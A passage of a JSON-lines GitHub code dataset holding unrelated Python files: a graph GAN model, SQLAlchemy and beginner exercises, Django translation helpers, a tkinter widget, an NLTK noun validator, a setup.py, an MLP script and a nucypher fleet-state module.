= torch.tensor(edge_index, dtype=torch.long)\r\n edge_attr = torch.tensor(edge_attr, dtype=torch.float)\r\n x = torch.tensor(x, dtype=torch.float)\r\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\r\n dataset.append(data)\r\n\r\n return dataset\r\n\r\n# ------------------------------------------------------------\r\n\r\ndef plotting_loss(losses_generator, losses_discriminator, epoch):\r\n plt.figure(1)\r\n plt.plot(epoch, losses_generator, 'r-')\r\n plt.plot(epoch, losses_discriminator, 'b-')\r\n plt.legend(['G Loss', 'D Loss'])\r\n plt.xlabel('Epoch')\r\n plt.ylabel('Loss')\r\n plt.savefig('./plot/loss' + str(epoch) + '.png')\r\n\r\n# -------------------------------------------------------------\r\n\r\n\r\nclass Generator(nn.Module):\r\n def __init__(self):\r\n super(Generator, self).__init__()\r\n\r\n nn = Sequential(Linear(1, (nbr_of_regions * nbr_of_regions)), ReLU())\r\n self.conv1 = NNConv(nbr_of_regions, nbr_of_regions, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv11 = BatchNorm(nbr_of_regions, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(1, nbr_of_regions), ReLU())\r\n self.conv2 = NNConv(nbr_of_regions, 1, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv22 = BatchNorm(1, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(1, nbr_of_regions), ReLU())\r\n self.conv3 = NNConv(1, nbr_of_regions, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv33 = BatchNorm(nbr_of_regions, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n def forward(self, data):\r\n x, edge_index, edge_attr = data.x, data.edge_index, data.edge_attr\r\n\r\n x1 = F.sigmoid(self.conv11(self.conv1(x, edge_index, edge_attr)))\r\n x1 = F.dropout(x1, training=self.training)\r\n\r\n x2 = F.sigmoid(self.conv22(self.conv2(x1, edge_index, edge_attr)))\r\n x2 = F.dropout(x2, training=self.training)\r\n\r\n x3 = torch.cat([F.sigmoid(self.conv33(self.conv3(x2, edge_index, edge_attr))), x1], dim=1)\r\n x4 = x3[:, 0:nbr_of_regions]\r\n x5 = x3[:, nbr_of_regions:2 * nbr_of_regions]\r\n\r\n x6 = (x4 + x5) / 2\r\n return (x6 + torch.transpose(x6, 0, 1)) / 2\r\n\r\n\r\nclass Discriminator(torch.nn.Module):\r\n def __init__(self):\r\n super(Discriminator, self).__init__()\r\n nn = Sequential(Linear(1, (nbr_of_regions * nbr_of_regions)), ReLU())\r\n self.conv1 = NNConv(nbr_of_regions, nbr_of_regions, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv11 = BatchNorm(nbr_of_regions, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(1, nbr_of_regions), ReLU())\r\n self.conv2 = NNConv(nbr_of_regions, 1, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv22 = BatchNorm(1, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n def forward(self, data):\r\n x, edge_index, edge_attr = data.x, data.edge_index, data.edge_attr\r\n\r\n x = F.relu(self.conv11(self.conv1(x, edge_index, edge_attr)))\r\n x = F.dropout(x, training=self.training)\r\n x = F.relu(self.conv22(self.conv2(x, edge_index, edge_attr)))\r\n\r\n return F.sigmoid((x + torch.transpose(x, 0, 1)) / 2)\r\n\r\n# ----------------------------------------\r\n# Training\r\n# ----------------------------------------\r\n\r\n\r\ndef register(args, generator, discriminator1, adversarial_loss, l1_loss, train_casted_source, train_casted_target,\r\n type):\r\n\r\n # Train Generator\r\n with torch.autograd.set_detect_anomaly(True):\r\n registered_outputs = []\r\n\r\n for data_A in train_casted_source:\r\n generators_output_ = generator(data_A).to(device) # 35 x35\r\n if type == 1:\r\n registered_outputs.append(generators_output_.detach())\r\n else:\r\n registered_outputs.append(generators_output_)\r\n generators_output = generators_output_.view(1, args.nbr_of_regions, args.nbr_of_regions, 1).type(\r\n torch.FloatTensor)\r\n if type == 0:\r\n generators_output_casted = [d.to(device) for d in cast_data(generators_output, 0)]\r\n for (data_discriminator) in generators_output_casted:\r\n discriminator_output_of_gen = discriminator1(data_discriminator).to(device)\r\n g_loss_adversarial = adversarial_loss(discriminator_output_of_gen,\r\n torch.ones_like(discriminator_output_of_gen).to(device))\r\n\r\n g_loss_pix2pix = l1_loss(generators_output_,\r\n train_casted_target[0].edge_attr.view(args.nbr_of_regions,\r\n args.nbr_of_regions))\r\n\r\n g_loss = g_loss_adversarial + (args.hyper_param1 * g_loss_pix2pix)\r\n loss_generator = g_loss\r\n\r\n discriminator_output_for_real_loss = discriminator1(train_casted_target[0]).to(device)\r\n\r\n real_loss = adversarial_loss(discriminator_output_for_real_loss,\r\n (torch.ones_like(discriminator_output_for_real_loss,\r\n requires_grad=False).to(device)))\r\n fake_loss = adversarial_loss(discriminator_output_of_gen.detach(),\r\n torch.zeros_like(discriminator_output_of_gen).to(device))\r\n\r\n d_loss = (real_loss + fake_loss) / 2\r\n loss_discriminator = d_loss\r\n\r\n if type == 0:\r\n return loss_generator, loss_discriminator, torch.stack(registered_outputs)\r\n else:\r\n return torch.stack(registered_outputs)\r\n","repo_name":"basiralab/GRN","sub_path":"gGAN.py","file_name":"gGAN.py","file_ext":"py","file_size_in_byte":14943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"16988660563","text":"from sqlalchemy import Table, Column, Integer, Text, select, insert\n\nfrom db import db_connect, create_tables, metadata\nfrom utils import print_result\n\nengine, connection = db_connect()\n\ndepartment = Table(\n \"departments\",\n metadata,\n Column(\"department_id\", Integer, primary_key=True),\n Column(\"department_name\", Text, nullable=False),\n)\n\nstudent = Table(\n \"students\",\n metadata,\n Column(\"student_id\", Integer, primary_key=True),\n Column(\"student_name\", Text, nullable=False),\n Column(\"department_id\", Integer, nullable=False),\n)\n\ncreate_tables(engine)\n\nnew_departments = [\n {\"department_name\": \"Electrical Engineering\"},\n {\"department_name\": \"Computer Engineering\"},\n {\"department_name\": \"Business Administration\"},\n]\n\nnew_students = [\n {\"student_name\": \"Alice\", \"department_id\": 1},\n {\"student_name\": \"Bob\", \"department_id\": 7},\n {\"student_name\": \"Jennifer\", \"department_id\": 13},\n {\"student_name\": \"Jasmine\", \"department_id\": 14},\n {\"student_name\": \"Steve\", \"department_id\": 77},\n {\"student_name\": \"Luis\", \"department_id\": 74},\n {\"student_name\": \"Jonathan\", \"department_id\": 1},\n {\"student_name\": \"Daiana\", \"department_id\": 7},\n {\"student_name\": \"Madelynn\", \"department_id\": 33},\n {\"student_name\": \"John\", \"department_id\": 1},\n]\n\nconnection.execute(insert(department), new_departments)\nconnection.execute(insert(student), new_students)\nconnection.commit()\n\nquery = (\n select(student.c.student_id, student.c.student_name)\n .where(student.c.department_id.not_in(select(department.c.department_id)))\n)\nresult = connection.execute(query)\nprint_result(result)\n\nconnection.close()\n","repo_name":"redmonkez12/sqlalchemy-practice","sub_path":"task_15/task_15_core.py","file_name":"task_15_core.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"26430706003","text":"from app.models import *\nfrom website.models import *\nfrom googletrans import Translator\ntranslator = Translator()\n\n#---------Industry translation----------------------------\ndef industryTranslation(user,language):\n \"\"\"Translation fuction of industry data from english ro franch language.\"\"\"\n industry1 = UserIndustryModel.objects.filter(user=user)\n my_list = []\n for data in industry1:\n my_dict={'industry_type':translator.translate(data.industry.industry_type,language).text}\n my_list.append(my_dict)\n return my_list\n\n#------------------------area tanslation---------------------------------\ndef areaTranslation(user,language):\n \"\"\"Translation fuction of area data from english ro franch language.\"\"\"\n area = UserAreaModel.objects.filter(user=user)\n my_list = []\n for data in area:\n my_dict={'area':translator.translate(data.area.area,language).text}\n my_list.append(my_dict)\n return my_list\n\ndef skillTranslation(user,language):\n \"\"\"Translation fuction of skill data from english ro franch language.\"\"\"\n skill = UserToolsAndLanguageModel.objects.filter(user=user)\n my_list = []\n for data in skill:\n my_dict={'skill':translator.translate(data.skill.name,language).text,\"rating\":data.rating}\n my_list.append(my_dict)\n return my_list\n#-------------User Language translation---------------------\ndef languageTranslation(user,language):\n \"\"\"Translation fuction of speaking language data from english ro franch language.\"\"\"\n lan = UserLanguageModel.objects.filter(user=user)\n my_list = []\n for data in lang:\n my_dict={'language':translator.translate(data.userLanguage.language_name,language).text,'rating':data.rating}\n my_list.append(my_dict)\n return my_list\n\n#--------------Education data------------------------\ndef EducationTranslation(user,language):\n \"\"\"Translation Education of Job Seeker from one language to another langyage\"\"\"\n edu = UserEducationModel.objects.filter(user=user)\n my_list = []\n for data in lang:\n my_dict={\n 'schoolName':translator.translate(data.schoolName,language).text,\n 'university_name':translator.translate(data.university_name,language).text,\n 'board':translator.translate(data.board,language).text,\n 'percentage':data.percentage,\n 'yos':data.yos,\n 'yop':data.yop,\n 'course':translator.translate(data.course,language).text,\n 'stream':translator.translate(data.stream,language).text,\n 'activity':translator.translate(data.activity,language).text,\n 'description':translator.translate(data.description,language).text, \n }\n my_list.append(my_dict)\n return my_list\n\n#-------------Personal Detail------------------------------------\ndef personalDetailTranslation(user,language):\n \"\"\"Job Seeker Personal data is translated form one languae to another\"\"\"\n personal = PersonalDetailModel.objects.get(user=user)\n my_dict={\n 'id':personal.id,\n 'working_hour':translator.translate(personal.work_hour.working_hour,language).text,\n 'professional_title':translator.translate(personal.professional_title,language).text,\n 'professional_description':translator.translate(personal.professional_description,language).text,\n 'paypal_account_id':translator.translate(personal.paypal_account_id,language).text,\n 'country':translator.translate(personal.country,language).text,\n 'timezone':translator.translate(personal.timezone,language).text,\n 'postal_code':translator.translate(personal.postal_code,language).text,\n 'city':translator.translate(personal.city,language).text,\n 'mobile':translator.translate(personal.mobile,language).text\n }\n return my_dict\n\n ","repo_name":"nutan0143sonu/ineedweb","sub_path":"website/translations.py","file_name":"translations.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36136287690","text":"stockApple = 5\nstockGrape = 7\nstockOrange = 8\n\npriceApple = 10000\npriceGrape = 15000\npriceOrange = 20000\n\n# User akan menginput jumlah qty buah yg diinginkan\nqtyApple = int(input('Masukkan jumlah Apel : '))\n# Jika permintaan user melebihi stock\nif qtyApple > stockApple:\n print(f'Kesalahan input, stock Apel : {stockApple}')\n qtyApple = 0\n\n# User akan menginput jumlah qty buah yg diinginkan\nqtyGrape = int(input('Masukkan jumlah Anggur : '))\n# Jika permintaan user melebihi stock\nif qtyGrape > stockGrape:\n print(f'Kesalahan input, stock Anggur : {stockGrape}')\n qtyGrape = 0\n\n# User akan menginput jumlah qty buah yg diinginkan\nqtyOrange = int(input('Masukkan jumlah Jeruk : '))\n# Jika permintaan user melebihi stock\nif qtyOrange > stockOrange:\n print(f'Kesalahan input, stock Jeruk : {stockOrange}')\n qtyOrange = 0\n\n# Hitung total harga setiap buah\ntotalApple = qtyApple * priceApple\ntotalGrape = qtyGrape * priceGrape\ntotalOrange = qtyOrange * priceOrange\n\n# Hitung total belanja keseluruhan\ntotalPrice = totalApple + totalGrape + totalOrange\n\nprint(\n 'Detail Belanja \\n\\n' +\n f'Apel : {qtyApple} x {priceApple} = {totalApple}\\n' +\n f'Anggur : {qtyGrape} x {priceGrape} = {totalGrape}\\n' +\n f'Jeruk : {qtyOrange} x {priceOrange} = {totalOrange}\\n\\n' +\n f'Total : {totalPrice}'\n)","repo_name":"abdurrahmanshidiq/fundamental-python","sub_path":"PYTHON/logic_if/scratchpad3.py","file_name":"scratchpad3.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28112020467","text":"# -*- coding: utf-8 -*-\nfrom tkinter import *\n\nfrom Model.Constants import BACKGROUND_COLOR\n\n\nclass Field(Frame):\n __doc__ = \"\"\"Class for the creation Field. This is a Frame with a Label on the left side, and a\n Entry on the right side.\"\"\"\n\n def __init__(self, parent=None, label=None, entry=\"\", **options):\n Frame.__init__(self, parent, bg=BACKGROUND_COLOR, **options)\n left = Frame(self, bg=BACKGROUND_COLOR)\n right = Frame(self, bg=BACKGROUND_COLOR)\n self.pack(fill=X)\n left.pack(side=LEFT, )\n right.pack(side=RIGHT, expand=YES, fill=X)\n\n lab = Label(left, bg=BACKGROUND_COLOR, width=8, text=label)\n self.ent = Entry(right)\n\n self.var = StringVar()\n self.var.set(str(entry))\n self.ent.config(textvariable=self.var)\n\n lab.pack(side=TOP)\n self.ent.pack(side=TOP, fill=X)\n\n def get_variable(self):\n \"\"\"Get the variable inside the Entry.\"\"\"\n return self.var\n\n def set_variable(self, s):\n \"\"\"Set the model's variable of the Entry. Use this to update automatically the field's\n view.\"\"\"\n self.var.set(str(s))\n","repo_name":"Emanz93/PIClassifier","sub_path":"GUI/Field.py","file_name":"Field.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32479222020","text":"import sys\nsys.stdin = open(\"input.txt\", \"r\")\n\ndef subset(k, sum):\n global result, S, mini\n if k == N:\n for i in range(N):\n if bit[i] == 1:\n sum += arr[i]\n result = sum - S\n if result >= 0 and mini > result:\n mini = result\n return\n else:\n bit[k] = 0\n subset(k+1, sum)\n bit[k] = 1\n subset(k+1, sum)\n\nT = int(input())\nfor tc in range(1, T+1):\n N, S = map(int, input().split())\n arr = list(map(int, input().split()))\n length = len(arr)\n result=[]\n mini = 99999\n bit = [0] * length\n subset(0,0)\n print(\"#{} {}\".format(tc, mini))\n","repo_name":"Haesungkang/Algorithm","sub_path":"2020/0907/장훈이의높은선반_강해성.py","file_name":"장훈이의높은선반_강해성.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33443011460","text":"import nltk\nfrom nltk import pos_tag, word_tokenize\nfrom nltk.corpus import wordnet as wn\nnltk.download('averaged_perceptron_tagger')\nnltk.download('wordnet')\nnltk.download('punkt')\n\ndef validate_noun(word):\n \n synsets = wn.synsets(word, pos=wn.NOUN)\n if synsets:\n \n for synset in synsets:\n if word.lower() in synset.lemma_names():\n return True\n return False\n\ndef validate_user_input(input_text):\n\n inappropriate_words = [\"explicit_word\", \"other_inappropriate_word\"]\n\n nouns = [word for word, pos in pos_tag(word_tokenize(input_text)) if pos.startswith('NN')]\n if not nouns:\n return False\n\n specific_nouns = [noun for noun in nouns if validate_noun(noun.lower()) and noun.lower() not in inappropriate_words]\n\n if specific_nouns:\n return True\n return False\n\n\nuser_input = input(\"Enter your input: \")\nis_valid = validate_user_input(user_input)\n\nif is_valid:\n print(\"The input is appropriate.\")\nelse:\n print(\"The input is not appropriate.\")","repo_name":"AI-Tech-Challenge/chroma-search","sub_path":"app/validation/Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41477678125","text":"import os\nimport setuptools\n\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n\ndef read(fname):\n with open(fname, \"r\") as f:\n return f.read()\n\n\ninstall_requires = [\n l\n for l in read(os.path.join(dir_path, \"requirements.txt\")).splitlines()\n if l and not l.startswith(\"#\")\n]\n\n\nsetuptools.setup(\n name=\"starlette-jsonrpc\",\n version=\"0.2.0\",\n author=\"Kamil Dębowski\",\n author_email=\"poczta@kdebowski.pl\",\n description=\"JSON-RPC implementation for Starlette framework\",\n long_description=read(\"README.md\"),\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/kdebowski/starlette-jsonrpc\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Intended Audience :: Developers\",\n ],\n install_requires=install_requires,\n include_package_data=True,\n)\n","repo_name":"kdebowski/starlette-jsonrpc","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"27"} +{"seq_id":"72608469512","text":"#!/usr/bin/python\nimport math\nimport pandas as pd\nfrom pandas import ExcelWriter\nfrom pandas import ExcelFile\n\ndf = pd.read_excel('input.xlsx', sheet_name='Sheet1')\n\n# taxa de aprendizagem - learning rate between 0 and 1\nlRate = 0.5\n\n# sinal de entrada - input value\nx0 = 1 # x0 is always +1\nx1 = df['x1']\n\n# valor desejado - desired value\nd = df['d']\n\n# numero de exemplos\nnEx = x1.count()\n\n# pesos dos neuronios da primeira camada // w1 = [(0.1, -0.3), (-0.7, 0.4)]\nw110 = 0.1\nw111 = -0.3\nw120 = -0.7\nw121 = 0.4\n\n# pesos dos neuronios da camada escondida // w2 = [-0.6, 0.1, -0.8]\nw210 = -0.6\nw211 = 0.1\nw212 = -0.8\n\nlog = open(\"output.txt\", \"w\") # create/open the file to write the log\n\n\n'''\n1) calculo da entrada liquida para os neuronios da camada escondida\nnet11 = ((w110 * x0) + (w111 * x1))\nnet12 = ((w120 * x0) + (w121 * x1))\n'''\n\n\ndef calculateNet4HiddenLayer(example):\n net11 = ((w110 * x0) + (w111 * x1[example]))\n net12 = ((w120 * x0) + (w121 * x1[example]))\n log.write('\\nnet11: ' + str(net11) + '\\tnet12: ' + str(net12))\n return (net11, net12)\n\n\n'''\n2) calculo da funcao de saida para os neuronios da camada escondida\ny11 = (1/(1 + math.exp(-net11)))\ny12 = (1/(1 + math.exp(-net12)))\n'''\n\n\ndef calculateY4HiddenLayer(net11, net12):\n y11 = (1/(1 + math.exp(-net11)))\n y12 = (1/(1 + math.exp(-net12)))\n log.write('\\ny11: ' + str(y11) + '\\ty12: ' + str(y12))\n return (y11, y12)\n\n\n'''\n3) calculo da entrada liquida para os neuronios de saida\nnet21 = ((w210*x0) + (w211*y11) + (w212*y12))\n'''\n\n\ndef calculateNet4Output(y11, y12):\n net21 = ((w210*x0) + (w211*y11) + (w212*y12))\n log.write('\\nnet21: ' + str(net21))\n return net21\n\n\n'''\n4) calculo da funcao de saida para os neuronios da camada de saida\ny21 = (1/(1 + math.exp(-net21)))\n'''\n\n\ndef calculateY4Output(net21):\n y21 = (1/(1 + math.exp(-net21)))\n log.write('\\ny21: ' + str(y21))\n return y21\n\n\n'''\n5) calculo do erro para os neuronios da camada de saida\nerror = (d - y21)\n'''\n\n\ndef calculateError(y21):\n error = (d - y21)\n log.write('\\nerror: ' + str(error))\n return error\n\n\n'''\n6) calculo das sensibilidades para os neuronios da camada de saida\ns21 = y21*(1-y21)*error\n'''\n\n\ndef calculateSensibility4OutputLayer(y21, error):\n s21 = y21*(1-y21)*error\n log.write('\\ns21: ' + str(s21))\n return s21\n\n\n'''\n7) calculo das sensibilidades para os neuronios da camada escondida\ns11 = y11*(1-y11)*w211*s21\ns12 = y12*(1-y12)*w212*s21\n'''\n\n\ndef calculateSensibility4HiddenLayer(y11, y12, s21):\n s11 = y11*(1-y11)*w211*s21\n s12 = y12*(1-y12)*w212*s21\n log.write('\\ns11: ' + str(s11) + '\\ts12: ' + str(s12))\n return (s11, s12)\n\n\n'''\n8) reajuste dos pesos que ligam a camada de saida a camada escondida\nw2ij(novo) = w2ij(antigo) + alpha*s2i*f1(met1j)\n'''\n\n\ndef balanceWeightOutputLayer(w210, w211, w212, s21, y21):\n w210 = float(format((w210 + lRate*s21*y21), '.2f'))\n w211 = float(format((w211 + lRate*s21*y21), '.2f'))\n w212 = float(format((w212 + lRate*s21*y21), '.2f'))\n\n\n'''\n9)reajuste dos pesos que ligam a camada escondida a camada de entrada\nw1ij(novo) = w1ij(antigo) + alpha * s1i * xj\n'''\n\n\ndef balanceWeightHiddenLayer(w110, w111, w120, w121, s11, s12, x0, x1):\n w110 = float(format((w110 + lRate*s11*x0), '.2f'))\n w120 = float(format((w120 + lRate*s11*x0), '.2f'))\n w111 = float(format((w111 + lRate*s12*x1), '.2f'))\n w121 = float(format((w121 + lRate*s12*x1), '.2f'))\n\n\nfor i in range(nEx):\n log.write('---------------Exemplo' + str(i))\n (net11, net12) = calculateNet4HiddenLayer(i)\n (y11, y12) = calculateY4HiddenLayer(net11, net12)\n net21 = calculateNet4Output(y11, y12)\n y21 = calculateY4Output(net21)\n error = calculateError(y21)\n s21 = calculateSensibility4OutputLayer(y21, error)\n (s11, s12) = calculateSensibility4HiddenLayer(y11, y12, s21)\n\nlog.close()\n","repo_name":"barbixxxa/neural-network","sub_path":"mlp/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"69989757511","text":"\n\n\nimport random\nimport weakref\nfrom collections import deque\nfrom collections.abc import KeysView\nfrom typing import Any, Dict, Iterable, List, NamedTuple, Optional, Union\n\nimport maya\nfrom eth_typing import ChecksumAddress\nfrom nucypher_core import FleetStateChecksum, NodeMetadata\n\nfrom nucypher import characters\nfrom nucypher.utilities.logging import Logger\n\nfrom .nicknames import Nickname\n\n\nclass ArchivedFleetState(NamedTuple):\n\n checksum: str\n nickname: Nickname\n timestamp: maya.MayaDT\n population: int\n\n def to_json(self):\n return dict(checksum=bytes(self.checksum).hex(),\n nickname=self.nickname.to_json(),\n timestamp=self.timestamp.rfc2822(),\n population=self.population)\n\n\nclass StateDiff(NamedTuple):\n this_node_updated: bool\n nodes_updated: List[ChecksumAddress]\n nodes_removed: List[ChecksumAddress]\n\n def empty(self):\n return not self.this_node_updated and not self.nodes_updated and not self.nodes_removed\n\n\nclass FleetState:\n \"\"\"\n Fleet state as perceived by a local \"Ursula\".\n\n Assumptions we're based on:\n\n - Every supplied node object, after its constructor has finished,\n has a ``.checksum_address`` and ``bytes()`` (metadata)\n - checksum address or metadata do not change for the same Python object\n - ``this_node`` (the owner of FleetSensor) may not have metadata initially\n (when the constructor is first called), but will have one at the time of the first\n `record_fleet_state()` call.\n - The metadata of ``this_node`` **can** change.\n - For the purposes of the fleet state, nodes with different metadata are considered different,\n even if they have the same checksum address.\n \"\"\"\n\n @classmethod\n def new(\n cls, this_node: Optional[\"characters.lawful.Ursula\"] = None\n ) -> \"FleetState\":\n this_node_ref = weakref.ref(this_node) if this_node else None\n # `this_node` might not have its metadata available yet.\n this_node_metadata = None\n\n return cls(nodes={},\n this_node_ref=this_node_ref,\n this_node_metadata=this_node_metadata)\n\n def __init__(\n self,\n nodes: Dict[ChecksumAddress, \"characters.lawful.Ursula\"],\n this_node_ref: Optional[weakref.ReferenceType],\n this_node_metadata: Optional[NodeMetadata],\n ):\n self.checksum = FleetStateChecksum(\n this_node=this_node_metadata,\n other_nodes=[node.metadata() for node in nodes.values()],\n )\n self.nickname = Nickname.from_seed(bytes(self.checksum), length=1)\n self._nodes = nodes\n self.timestamp = maya.now()\n self._this_node_ref = this_node_ref\n self._this_node_metadata = this_node_metadata\n\n def archived(self) -> ArchivedFleetState:\n return ArchivedFleetState(checksum=self.checksum,\n nickname=self.nickname,\n timestamp=self.timestamp,\n population=self.population)\n\n def _calculate_diff(\n self,\n this_node_updated: bool,\n nodes_to_add: Iterable[\"characters.lawful.Ursula\"],\n nodes_to_remove: Iterable[ChecksumAddress],\n ) -> StateDiff:\n nodes_updated = []\n for node in nodes_to_add:\n if node.checksum_address in nodes_to_remove:\n continue\n unknown = node.checksum_address not in self._nodes\n if unknown or bytes(self._nodes[node.checksum_address].metadata()) != bytes(node.metadata()):\n nodes_updated.append(node.checksum_address)\n\n nodes_removed = []\n for checksum_address in nodes_to_remove:\n if checksum_address in self._nodes:\n nodes_removed.append(checksum_address)\n\n return StateDiff(this_node_updated=this_node_updated,\n nodes_updated=nodes_updated,\n nodes_removed=nodes_removed)\n\n def with_updated_nodes(\n self,\n nodes_to_add: Iterable[\"characters.lawful.Ursula\"],\n nodes_to_remove: Iterable[ChecksumAddress],\n skip_this_node: bool = False,\n ) -> \"FleetState\":\n if self._this_node_ref is not None and not skip_this_node:\n this_node = self._this_node_ref()\n this_node_metadata = this_node.metadata()\n this_node_updated = self._this_node_metadata != this_node_metadata\n else:\n this_node_metadata = self._this_node_metadata\n this_node_updated = False\n\n diff = self._calculate_diff(this_node_updated, nodes_to_add, nodes_to_remove)\n\n if not diff.empty():\n # TODO: if nodes were kept in a Merkle tree,\n # we'd have to only recalculate log(N) checksums.\n # Is it worth it?\n nodes = dict(self._nodes)\n nodes_to_add_dict = {node.checksum_address: node for node in nodes_to_add}\n for checksum_address in diff.nodes_updated:\n new_node = nodes_to_add_dict[checksum_address]\n nodes[checksum_address] = new_node\n for checksum_address in diff.nodes_removed:\n del nodes[checksum_address]\n else:\n nodes = self._nodes\n\n new_state = FleetState(nodes=nodes,\n this_node_ref=self._this_node_ref,\n this_node_metadata=this_node_metadata)\n\n return new_state, diff\n\n @property\n def population(self) -> int:\n \"\"\"Returns the number of all known nodes, including itself, if applicable.\"\"\"\n return len(self) + int(self._this_node_metadata is not None)\n\n def __getitem__(self, checksum_address):\n return self._nodes[checksum_address]\n\n def addresses(self) -> KeysView:\n return self._nodes.keys()\n\n def __bool__(self):\n return len(self) != 0\n\n def __contains__(self, item):\n if isinstance(item, str):\n return item in self._nodes\n else:\n return item.checksum_address in self._nodes\n\n def __iter__(self):\n yield from self._nodes.values()\n\n def __len__(self):\n return len(self._nodes)\n\n def shuffled(self) -> List[\"characters.lawful.Ursula\"]:\n nodes_we_know_about = list(self._nodes.values())\n random.shuffle(nodes_we_know_about)\n return nodes_we_know_about\n\n def to_json(self) -> Dict:\n return dict(nickname=self.nickname.to_json(),\n updated=self.timestamp.rfc2822())\n\n @property\n def icon(self) -> str:\n return self.nickname.icon\n\n def items(self):\n return self._nodes.items()\n\n def values(self):\n return self._nodes.values()\n\n def __str__(self):\n return '{checksum} ⇀{nickname}↽ {icon} '.format(icon=self.nickname.icon,\n nickname=self.nickname,\n checksum=bytes(self.checksum).hex()[:7])\n\n def __repr__(self):\n return f\"FleetState({self.checksum}, {self._nodes}, {self._this_node_ref}, {self._this_node_metadata})\"\n\n\nclass FleetSensor:\n \"\"\"\n A representation of a fleet of NuCypher nodes.\n\n If `this_node` is provided, it will be included in the state checksum\n (but not returned during iteration/lookups).\n \"\"\"\n log = Logger(\"Learning\")\n\n def __init__(\n self, domain: str, this_node: Optional[\"characters.lawful.Ursula\"] = None\n ):\n self._domain = domain\n\n self._current_state = FleetState.new(this_node)\n self._archived_states = deque([self._current_state.archived()], maxlen=5)\n self._remote_states = {}\n self._remote_last_seen = {}\n\n # temporary accumulator for new nodes to avoid updating the fleet state every time\n self._nodes_to_add = set()\n self._nodes_to_remove = set() # Beginning of bucketing.\n\n self._auto_update_state = False\n\n def record_node(self, node: \"characters.lawful.Ursula\"):\n\n if node.domain == self._domain:\n # Replace the existing object with a newer object, even if they're equal\n # (this object can be mutated externally).\n # This behavior is supposed to be consistent with that of the node storage\n # (where a newer object with the same `checksum_address` replaces an older one).\n if node in self._nodes_to_add:\n self._nodes_to_add.remove(node)\n self._nodes_to_add.add(node)\n\n if self._auto_update_state:\n self.log.info(f\"Updating fleet state after saving node {node}\")\n self.record_fleet_state()\n else:\n msg = f\"Rejected node {node} because its domain is '{node.domain}' but we're only tracking '{self._domain}'\"\n self.log.warn(msg)\n\n def __getitem__(self, item):\n return self._current_state[item]\n\n def __bool__(self):\n return bool(self._current_state)\n\n def __contains__(self, item):\n \"\"\"\n Checks if the node *with the same metadata* is recorded in the current state.\n Does not compare ``item`` with the owner node of this FleetSensor.\n \"\"\"\n return item in self._current_state\n\n def __iter__(self):\n yield from self._current_state\n\n def __len__(self):\n return len(self._current_state)\n\n def __repr__(self):\n return f\"FleetSensor({self._current_state.__repr__()})\"\n\n @property\n def current_state(self):\n return self._current_state\n\n @property\n def checksum(self):\n return self._current_state.checksum\n\n @property\n def population(self):\n return self._current_state.population\n\n @property\n def nickname(self):\n return self._current_state.nickname\n\n @property\n def icon(self) -> str:\n return self._current_state.icon\n\n @property\n def timestamp(self):\n return self._current_state.timestamp\n\n def items(self):\n return self._current_state.items()\n\n def values(self):\n return self._current_state.values()\n\n def latest_state(self) -> ArchivedFleetState:\n # `_archived_states` is never empty, one state is created in the constructor\n return self._archived_states[-1]\n\n def previous_states(self, quantity: int) -> List[ArchivedFleetState]:\n \"\"\"\n Returns at most ``quantity`` latest archived states (*not* including the current one),\n in chronological order.\n \"\"\"\n # `_archived_states` is never empty, one state is created in the constructor\n previous_states_num = min(len(self._archived_states) - 1, quantity)\n return list(self._archived_states)[-previous_states_num-1:-1]\n\n def addresses(self):\n return self._current_state.addresses()\n\n def record_fleet_state(self, skip_this_node: bool = False) -> StateDiff:\n new_state, diff = self._current_state.with_updated_nodes(nodes_to_add=self._nodes_to_add,\n nodes_to_remove=self._nodes_to_remove,\n skip_this_node=skip_this_node)\n\n self._nodes_to_add = set()\n self._nodes_to_remove = set()\n self._current_state = new_state\n\n # TODO: set a limit on the number of archived states?\n # Two ways to collect archived states:\n # 1. (current) add a state to the archive every time it changes\n # 2. (possible) keep a dictionary of known states\n # and bump the timestamp of a previously encountered one\n if not diff.empty():\n archived_state = new_state.archived()\n self._archived_states.append(archived_state)\n\n return diff\n\n def shuffled(self):\n return self._current_state.shuffled()\n\n def mark_as(self, label: Exception, node: \"characters.lawful.Ursula\"):\n # TODO: for now we're not using `label` in any way, so we're just ignoring 